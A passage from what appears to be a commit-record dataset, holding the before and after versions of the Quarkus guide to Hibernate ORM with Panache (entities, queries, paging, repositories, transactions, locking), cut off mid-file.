findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] 
[order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nIn Quarkus, every method that modifies the database must be run in a transaction. If you try to modify the database \noutside a transaction you will get an exception. It is not required for querying operations.\n\nYou can annotate any method with `@Transactional` in order to get a transaction. We recommend doing so in your\nREST endpoints where you manipulate entities.\n\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting the framework handle them. Once again, we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. 
Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly dealing with, such as:\n\n- Duplicating ID logic: most entities need an ID, and most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise splitting the entity definition (the model) from the operations you can do on it\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in an object-oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getters and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. 
\n\n== Defining entities in external projects or jars\n\nHibernate ORM with Panache in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you should build those jars with the Jandex Maven plugin, so that your entities will be indexed and found by Quarkus\nand enhanced:\n\n[source,xml]\n--\n<plugin>\n <groupId>org.jboss.jandex<\/groupId>\n <artifactId>jandex-maven-plugin<\/artifactId>\n <version>1.0.3<\/version>\n <executions>\n <execution>\n <id>make-index<\/id>\n <goals>\n <goal>jandex<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <dependencies>\n <dependency>\n <groupId>org.jboss<\/groupId>\n <artifactId>jandex<\/artifactId>\n <version>2.1.1.Final<\/version>\n <\/dependency>\n <\/dependencies>\n<\/plugin>\n--\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d8b6fa3592c4a2154e7f0ea07232db0125d36b6","subject":"docs(hibernate): fix typo","message":"docs(hibernate): fix typo\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache is allowing you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nHave you noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualizes the rest. 
That makes for very concise yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. 
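For example (a minimal sketch; the `nickname` field is purely illustrative):\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n\n \/\/ this field is ignored by Hibernate ORM and not stored in the database\n @Transient\n public String nickname;\n}\n--\n\n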
If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUpperCase();\n }\n \n public void setName(String name){\n this.name = name.toLowerCase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all field calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. 
For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nlong count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream();\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows you to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] 
[order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\nNOTE: You can also write your queries in plain \nlink:https:\/\/docs.jboss.org\/hibernate\/orm\/5.4\/userguide\/html_single\/Hibernate_User_Guide.html#hql[HQL]:\n\n[source,java]\n--\nOrder.find(\"select distinct o from Order o left join fetch o.lineItems\");\n--\n\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nMake sure to wrap methods modifying your database (e.g. `entity.persist()`) within a transaction. Marking a \nCDI bean method `@Transactional` will do that for you and make that method a transaction boundary. 
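For example, a hypothetical JAX-RS resource method could look like this (a minimal sketch; the resource class, path, and `create` method are illustrative, not from the guide):\n\n[source,java]\n--\n@Path(\"\/persons\")\npublic class PersonResource {\n\n \/\/ the method body runs in a transaction; changes are\n \/\/ committed when the method completes successfully\n @POST\n @Transactional\n public void create(Person person) {\n person.persist();\n }\n}\n--\n\n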
We recommend doing \nso at your application entry point boundaries like your REST endpoint controllers.\n\n== Lock management\n\nPanache does not provide direct support for database locking, but you can do it by obtaining the `EntityManager` (by injecting it into a `PanacheRepository`, or via `Panache.getEntityManager()` in an entity's static methods) and creating a specific method that will use the entity manager to lock the entity after retrieval.\n\nThe following example contains a `findByIdForUpdate` method that finds the entity by primary key and then locks it. The lock will generate a `SELECT ... FOR UPDATE` query (the same principle can be used for other kinds of `find*` methods):\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n\n public static Person findByIdForUpdate(Long id){\n Person person = findById(id);\n \/\/ lock with the PESSIMISTIC_WRITE lock mode type: this will generate a SELECT ... FOR UPDATE query\n Panache.getEntityManager().lock(person, LockModeType.PESSIMISTIC_WRITE);\n return person;\n }\n}\n--\n\nThis will generate two select queries: one to retrieve the entity and a second one to lock it. Be aware that locks are released when the transaction ends, so the method that invokes the lock query must be annotated with the `@Transactional` annotation.\n\nWe are currently evaluating adding support for lock management inside Panache. If you are interested, please visit our GitHub issue link:https:\/\/github.com\/quarkusio\/quarkus\/issues\/2744[#2744] and contribute to the discussion.\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting the framework handle them. Once again, we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. 
Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly dealing with, such as:\n\n- Duplicating ID logic: most entities need an ID, and most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise splitting the entity definition (the model) from the operations you can do on it\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in an object-oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getters and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. Users can just start using\nyour entity `Person` by typing `Person.` and getting completion for all the operations in a single place.\n- Don't write parts of the query that you don't need: write `Person.find(\"order by name\")` or\n`Person.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive)` or even better\n`Person.find(\"name\", \"stef\")`.\n\nThat's all there is to it: with Panache, Hibernate ORM has never looked so trim and neat. 
\n\n== Defining entities in external projects or jars\n\nHibernate ORM in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you can make sure that your jar is treated like a Quarkus application library by adding an empty `META-INF\/beans.xml` file.\nThis will allow Quarkus to index and enhance your entities as if they were inside the current project.\n\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache is allowing you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nHave you noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualizes the rest. 
That makes for very concise yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. 
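For example (a minimal sketch; the `nickname` field is purely illustrative):\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n\n \/\/ this field is ignored by Hibernate ORM and not stored in the database\n @Transient\n public String nickname;\n}\n--\n\n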
If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUpperCase();\n }\n \n public void setName(String name){\n this.name = name.toLowerCase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all field calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. 
For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nlong count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream();\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows you to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] 
[order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\nNOTE: You can also write your queries in plain \nlink:https:\/\/docs.jboss.org\/hibernate\/orm\/5.4\/userguide\/html_single\/Hibernate_User_Guide.html#hql[HQL]:\n\n[source,java]\n--\nOrder.find(\"select distinct o from Order o left join fetch o.lineItems\");\n--\n\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return 